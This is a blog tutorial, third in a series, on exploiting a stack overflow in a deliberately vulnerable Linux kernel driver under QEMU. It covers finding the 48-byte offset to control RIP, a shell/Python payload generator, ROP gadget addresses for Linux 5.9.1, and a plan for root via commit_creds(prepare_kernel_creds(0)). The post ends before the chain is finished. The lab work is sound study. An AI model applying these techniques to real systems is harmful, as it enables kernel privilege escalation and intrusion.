[Linux Kernel Exploitation 0x2] Controlling RIP and Escalating privileges via Stack Overflow

Previous Post in Series:

  1. [Linux Kernel Exploitation 0x0] Debugging the Kernel with QEMU https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x0-debugging.html
  2. [Linux Kernel Exploitation 0x1] Smashing Stack Overflows in the Kernel https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x1-smashing.html
  3. this post
Hi folks! I'm back and this time I've got a banger of a post; we're going to finish off the last part of the exploit chain for stack overflows. In the previous post we discussed some details of memory protections in the kernel and looked at what a few probes around some of the memory structures looked like. If you don't know how to debug a Linux Kernel, build one or build a Qemu image please check out the previous stuff in the series. In this post we're going to start really wielding our power over the stack and craft ROP chains and calls to some interesting functions.

Controlling EIP (No Canary)

So the last time we discussed about canaries we turned off CONFIG_STACKPROTECTOR and looked at the stack to confirm there was absolutely no protection. What I did after that and behind the scenes was check out if VMAP_STACK has any significant impact, this is because initially my writes were triggering a ton of page faults! After that I made an adjustment to the driver, basically changed target_buf to a finite sized char buffer "char target[16]". This seemed to smooth my stack smashing success. So I again implore you to use the target driver for our following set of examples.
First lets find the length at which we start overwriting the return address or register that ends up in RIP. This is not the best explanation but to keep things simple my procedure was: To increase my write length 1 byte at a time, check the kind of error triggered and then set a taint value like 0x43434343 at the end of my payload to see if it ends up in any registers or interesting places when a fault is triggered. 
Eventually this laborious process yielded a length of 48 characters before I could perfectly overwrite the RIP value, to demonstrate check out this nifty screenshot:

GDB output showing that an address from our payload is actually executed in the kernel! We officially control execution woo hoo!

For those who want to recreate this using the stuff I setup for the test, you'll need to fire off these commands---making sure you're module is loaded and accessible:

./stacksmash_test_addr.sh 48 [address to execute]

and if you want to see what ./stacksmash_test_addr.sh does, its very simple, it basically just takes a payload length and a hexadecimal address as input and it spits out a string that we can use as a payload, here's the code:

./stacksmash_app.elf `python -c '\
import sys;
address_string="".join([chr(int(address[2:][i:i+2],16)) for i in range(0,len(address[2:])+2,2) if len(address[2:][i:i+2]) != 0][::-1]);print("A"*int(sys.argv[1])+address_string)' $LENGTH $ADDR` 10

I've tried to clean it up a bit but honestly all I'm doing here is trying some ugly python to convert a hexadecimal address into a format that ends up in memory properly.  Its not crucial to understand everything that happens here because there are much much less complicated ways to achieve this, I'm just trying to go through the most straightforward way as possible so everyone can participate without requiring much background in kernel dev.

In the above screenshot one should note that the breakpoint is set for a weird enough function that we know we are triggering execution---beacause it may happen that you get all happy about triggering a ROP payload when its just natural kernel noise hehe. Congratulations you just controlled execution at one of the highest privilege levels available to a human being---on a Linux computer! Fancy stuff! The next step is to start chaining together instructions that achieve a goal we want.

Privilege Escalation for Kernel Intruders

Before we do that lets layout a game plan. There are any number of things we can do with these new gained kernel powers but lets try something simple, get root creds. So what we need to do is get the kernel to make our userland process insta-root! It turns out there are functions loaded into the kernel symbol table that literally do that:
  • prepare_kernel_creds(struct task_struct *daemon) is a function that generates a cred structure. We need this for our call to the next important function. I know it takes a weird task_struct thing but fret not, the documentation indicates that this can be NULL, which will essentially trigger some default option that gives us "full creds".
  • commit_creds(struct cred *) this function does the actual deed and installs the cred structure to our task.
So we need some Return Oriented Programing (ROP) chain that puts together a call like this commit_creds(prepare_kernel_creds(0)), which means in terms of assembler instructions, we need:
  • an instruction chain that puts a null in rdi before we call prepare_kernel_creds. This is because according to calling convention rdi holds the first parameter.
  • an instruction chain that grabs the returned cred structure---which will be a pointer in rax at this point---, and sticks it in rdi before our call to commit_creds
Beyond this there's also the problem of leaving the realm of the kernel to enjoy your new found powers in middle earth. Luckily for us there's a couple methods one can use to leave, each of them requiring something different of the stack and register value set. 
We'll address this after our ROP chain is almost complete, so in summary, our plan so far is:
  1. RIP Control: Find a write length that controls the RIP
  2. ROP Chain: Build a ROP Chain that calls commit_creds(prepare_kernel_creds(0))
  3. Return2Userland: Exit the kernel safely using iretq, sysexit, etc
Our overall plan will vary slightly depending on the protections available in the stack for now lets keep it simple.

Building a ROP chain

We need a tool that will compile some ROP friendly instructions. I relied on ROPGadget.py it seems to get the job done although I'm sure there are tons of tools that will be able to handle this. Here's me dumping ROP gadgets for the kernel im attacking here (which is the Linux 5.9.1):

Screenshot of some ROPGadget.py output after being run on the vmlinux image for our target Kernel.

Okay so we needed to pick up a couple gadgets. To start lets setup a little gadget to call any function pointer on the stack, here are my candidates:
  • 0xffffffff8124529d pop rbx ; ret
  • 0xffffffff8230f2ff call rbx 

Using these gadgets means we essentially want to pop something into rbx, this requires us to then have somethin on the stack; for us this means packing in an address to the prepare_kernel_creds call, which would look like this basically: 


Okay so we need to somehow use ./stacksmash_test_addr.sh to pack two addresses into the payload, I've tried more sophisticated ways and they are currently failing so I've decided to stick with this clunky script for now. Anyway here's how you stuff more than one address into the payload, call stacksmash_test_add.sh as follows:
./stacksmash_test_addr.sh 48 0xffffffff8230f2ffffffffff81088be0ffffffff8124529d
This is going to prove a little tricky because of the default terminal line size on qemu which I haven't figured out how to change yet--I'll update this once i do! Anyway if you get this write what should end up on your stack is the following:
Some gdb output confirming we actually are building a sane payload. Here I just grab the address the buf parameter from a kernel mediated call to vfs_write, this helps me make sure I'm looking at the correct buffer, before the driver touches it.

And if you manage to actually run the sample payload here you should hit breakpoints that indicate you're in control:

That confirms that we are hitting the right notes and we can pretty much call any function now with this neat little gadget! What we need to do now is prepare a ROP chain to stick a NULL in rdi before we make the call to preapre_kernel_cred. And just a note when choosing gadgets I would prioritize those that cause the least stack drama---some ret instructions specify an offset with which to bump the return address so watch out---, affect as little registers as possible. But I suggest just trying stuff, you actually learn a lot from seeing gadgets not work!


I've been stuck at this point for a few weeks so I'm going to cut my losses with this post and end it here we'll prepare the rest of the payload in the next post. Enjoy! 

Reading and References